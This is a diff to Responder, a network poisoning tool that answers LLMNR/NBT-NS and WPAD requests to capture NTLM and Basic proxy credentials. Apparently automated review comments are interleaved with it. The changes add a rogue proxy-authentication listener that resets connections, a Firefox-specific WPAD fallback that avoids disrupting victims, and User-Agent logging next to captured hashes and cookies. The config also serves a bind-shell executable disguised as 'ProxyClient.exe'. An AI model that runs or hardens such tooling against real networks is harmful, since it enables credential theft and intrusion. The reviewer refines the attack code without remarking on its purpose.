diff --git a/Responder.conf b/Responder.conf
index 6263e6b..3b66777 100644
--- a/Responder.conf
+++ b/Responder.conf
@@ -42,11 +42,11 @@ RespondToName =
 ; Specific IP Addresses not to respond to (default = None)
 ; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
-DontRespondTo =
+DontRespondTo =
 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
 ; Example: DontRespondTo = NAC, IPS, IDS
-DontRespondToName =
+DontRespondToName = ISATAP
 ; If set to On, we will stop answering further requests from a host
 ; if a hash hash been previously captured for this host.
@@ -79,7 +79,7 @@ ExeFilename = files/BindShell.exe
 ExeDownloadName = ProxyClient.exe
 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY RespProxySrv:3128; PROXY RespProxySrv:3141; DIRECT';}
+WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
 ; HTML answer to inject in HTTP responses (before tag).
 ; Set to an empty string to disable.
diff --git a/Responder.py b/Responder.py
index 99e03d5..8da125e 100755
--- a/Responder.py
+++ b/Responder.py
@@ -20,7 +20,7 @@ import ssl
 from SocketServer import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
-
+import struct
 banner()
 parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
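Review bot: `DontRespondToName = ISATAP` changes the shipped default without a comment saying why that name is excluded, so an operator trimming the list has no way to know whether removing it is safe; a one-line `;` comment above the key stating the reason would fix that. The `; Example:` line directly above still reads `DontRespondTo = NAC, IPS, IDS` for a key that is actually `DontRespondToName`, and since this hunk is already touching that key it is the natural place to correct it to `; Example: DontRespondToName = NAC, IPS, IDS`. The `-DontRespondTo =` / `+DontRespondTo =` pair at the top of the hunk appears to be a whitespace-only change once the surrounding formatting is lost, and could be dropped from the commit.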
@@ -77,6 +77,16 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 pass
 TCPServer.server_bind(self)
+class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
+ def server_bind(self):
+ if OsInterfaceIsSupported():
+ try:
+ self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+ except:
+ pass
+ self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+ TCPServer.server_bind(self)
+
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 def server_bind(self):
 MADDR = "224.0.0.251"
@@ -113,6 +123,7 @@ ThreadingUDPServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 ThreadingUDPMDNSServer.allow_reuse_address = 1
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
+ThreadingTCPServerAuth.allow_reuse_address = 1
 def serve_thread_udp_broadcast(host, port, handler):
 try:
@@ -160,6 +171,17 @@ def serve_thread_tcp(host, port, handler):
 except:
 print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+def serve_thread_tcp_auth(host, port, handler):
+ try:
+ if OsInterfaceIsSupported():
+ server = ThreadingTCPServerAuth((settings.Config.Bind_To, port), handler)
+ server.serve_forever()
+ else:
+ server = ThreadingTCPServerAuth((host, port), handler)
+ server.serve_forever()
+ except:
+ print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+
 def serve_thread_SSL(host, port, handler):
 try:
@@ -207,7 +229,7 @@ def main():
 if settings.Config.ProxyAuth_On_Off:
 from servers.Proxy_Auth import Proxy_Auth
- threads.append(Thread(target=serve_thread_tcp, args=('', 3128, Proxy_Auth,)))
+ threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,)))
 if settings.Config.SMB_On_Off:
 if settings.Config.LM_On_Off:
diff --git a/packets.py b/packets.py
index 560a3b0..182ec1d 100644
--- a/packets.py
+++ b/packets.py
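Review bot: `ThreadingTCPServerAuth.server_bind` repeats the body of `ThreadingTCPServer.server_bind` (whose tail is visible in the context lines above it) and only adds the SO_LINGER call, so the two copies will drift apart on the next fix to either; deriving from the existing class and calling its `server_bind` removes the duplication and the second copy of the bare numeric `25` socket option (SO_BINDTODEVICE on Linux), which deserves a named constant with a comment wherever it stays. The `struct.pack('ii', 1, 0)` argument also needs a comment: linger enabled with a zero timeout makes `close()` reset the connection instead of shutting it down gracefully, which is the behaviour the Proxy_Auth handler's new comment relies on, and whether accepted sockets inherit the option from the listener is platform-dependent, so that assumption should be written down too. The `except: pass` around the first `setsockopt` silently hides permission and platform errors, leaving an operator with a server that ignores `Bind_To` and no message saying why.
```python
class ThreadingTCPServerAuth(ThreadingTCPServer):
	def server_bind(self):
		# linger on, timeout 0: close() sends a RST instead of a graceful FIN/ACK
		# exchange; relies on accepted sockets inheriting the option from the
		# listener (platform-dependent; verified on Linux only).
		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
		ThreadingTCPServer.server_bind(self)
```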
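Review bot: `serve_thread_tcp_auth` is a line-for-line copy of `serve_thread_tcp` with only the server class changed, and both swallow every exception behind the same generic message, so a failed bind on 3128 cannot be told apart from a crash inside the serving loop. A keyword parameter on the existing function avoids the copy: `def serve_thread_tcp(host, port, handler, server_class=ThreadingTCPServer):` with `server = server_class((settings.Config.Bind_To, port), handler)` in both branches, and `main()` passing `server_class=ThreadingTCPServerAuth` for the Proxy_Auth thread instead of switching targets. Whichever shape is kept, `except Exception as e:` and appending `str(e)` to the printed message would preserve the actual reason. Note that `serve_forever()` runs inside the `try`, so anything it raises later is also reported as a startup error.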
@@ -1583,3 +1583,4 @@ class SMB2Session2Data(Packet):
 ])
+
diff --git a/servers/HTTP.py b/servers/HTTP.py
index f1db943..5d17fa5 100644
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@@ -14,9 +14,9 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program. If not, see .
+import struct
 from SocketServer import BaseRequestHandler, StreamRequestHandler
 from base64 import b64decode
-import struct
 from utils import *
 from packets import NTLM_Challenge
@@ -103,9 +103,26 @@ def GrabReferer(data, host):
 return Referer
 return False
+def SpotFirefox(data):
+ UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+ print text("[HTTP] %s" % color("User-Agent : "+UserAgent[0], 2))
+ if UserAgent:
+ IsFirefox = re.search('Firefox', UserAgent[0])
+ if IsFirefox:
+ print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1)
+ print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1)
+ return True
+ else:
+ return False
+
 def WpadCustom(data, client):
 Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
- if Wpad:
+ if Wpad and SpotFirefox(data):
+ Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
+ Buffer.calculate()
+ return str(Buffer)
+
+ if Wpad and SpotFirefox(data) == False:
 Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
 Buffer.calculate()
 return str(Buffer)
diff --git a/servers/Proxy_Auth.py b/servers/Proxy_Auth.py
index cf6edc3..c7c8adc 100644
--- a/servers/Proxy_Auth.py
+++ b/servers/Proxy_Auth.py
@@ -19,6 +19,10 @@ from HTTP import ParseHTTPHash
 from packets import *
 from utils import *
+def GrabUserAgent(data):
+ UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+ print text("[Proxy-Auth] %s" % color("User-Agent : "+UserAgent[0], 2))
+
 def GrabCookie(data):
 Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
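Review bot: `SpotFirefox` indexes `UserAgent[0]` in the `print` on its second line before the `if UserAgent:` guard on the third, so any request without a `User-Agent` header raises IndexError out of the handler; the guard has to come first. The same unguarded `UserAgent[0]` is in `GrabUserAgent` in the `servers/Proxy_Auth.py` hunk below, where it has no guard at all and appears to end up in the bare `except: pass` at the end of `Proxy_Auth.handle`. `WpadCustom` also calls `SpotFirefox(data)` twice for the same request, printing the User-Agent line (and the two warnings) twice, and `== False` should be `not`; calling it once and choosing the payload removes both. If the function only falls through when `UserAgent` is empty it implicitly returns `None`, which the `== False` comparison in `WpadCustom` then treats as "not Firefox" only by accident. `WpadCustom` may continue past the end of this hunk.
```python
def SpotFirefox(data):
	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
	if not UserAgent:
		return False
	print text("[HTTP] %s" % color("User-Agent : "+UserAgent[0], 2))
	if 'Firefox' not in UserAgent[0]:
		return False
	# … unchanged: the two [WARNING] prints …
	return True

def WpadCustom(data, client):
	Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
	if Wpad:
		if SpotFirefox(data):
			Payload = "function FindProxyForURL(url, host){return 'DIRECT';}"
		else:
			Payload = settings.Config.WPAD_Script
		Buffer = WPADScript(Payload=Payload)
		Buffer.calculate()
		return str(Buffer)
```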
@@ -59,13 +63,15 @@ def PacketSequence(data, client):
 if Packet_NTLM == "\x03":
 NTLM_Auth = b64decode(''.join(NTLM_Auth))
 ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
+ GrabUserAgent(data)
 GrabCookie(data)
 GrabHost(data)
- return False
+ return False #Send a RST with SO_LINGER when close() is called (see Responder.py)
 else:
 return False
 elif Basic_Auth:
+ GrabUserAgent(data)
 GrabCookie(data)
 GrabHost(data)
 ClearText_Auth = b64decode(''.join(Basic_Auth))
@@ -90,12 +96,7 @@ def PacketSequence(data, client):
 return str(Response)
 class Proxy_Auth(SocketServer.BaseRequestHandler):
-
- def server_bind(self):
- self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
- self.socket.bind(self.server_address)
- self.socket.setblocking(0)
- self.socket.setdefaulttimeout(1)
+
 def handle(self):
 try:
@@ -106,3 +107,4 @@ class Proxy_Auth(SocketServer.BaseRequestHandler):
 except:
 pass
+